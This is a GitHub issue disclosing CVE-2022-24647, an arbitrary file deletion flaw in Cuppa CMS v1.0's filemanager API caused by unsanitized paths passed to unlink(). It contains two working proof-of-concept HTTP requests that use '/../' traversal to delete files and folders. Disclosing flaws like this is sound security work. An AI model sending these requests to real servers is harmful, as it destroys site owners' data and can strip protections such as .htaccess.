Headline
CVE-2022-24647: Multiple Unauthorized Arbitrary File Deletion vulnerabilities · Issue #23 · CuppaCMS/CuppaCMS
Cuppa CMS v1.0 was discovered to contain an arbitrary file deletion vulnerability via the unlink() function.
Vulnerability Name: Multiple Arbitrary File Deletion
Date of Discovery: 06 Feb 2022
Product version:cuppaCMS v1.0Download link
Author: lyy
Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
Proof of Concept 1
Vulnerable URL: http://cuppacms/js/filemanager/api/index.php
Vulnerable Code: line 116,118 - cuppacms/js/filemanager/api/FileManager.php
Steps to Reproduce:
1.Send the request directly through burp
POST /js/filemanager/api/index.php HTTP/1.1
Host: cuppacms
Content-Length: 45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://cuppacms
Referer: http://cuppacms/js/filemanager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"path":"/../test.php","action":"deleteFile"}
2.You can traverse the directory to delete any file
Proof of Concept 2
Vulnerable URL: http://cuppacms/js/filemanager/api/index.php
Vulnerable Code: line 124,138 - cuppacms/js/filemanager/api/FileManager.php
Steps to Reproduce:
1.Send the request directly through burp
POST /js/filemanager/api/index.php HTTP/1.1
Host: cuppacms
Content-Length: 40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://cuppacms
Referer: http://cuppacms/js/filemanager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"path":"/../1","action":"deleteFolder"}
2.You can traverse directories and delete directories,Delete all files in the directory while deleting the directory, so as to achieve the effect of deleting any file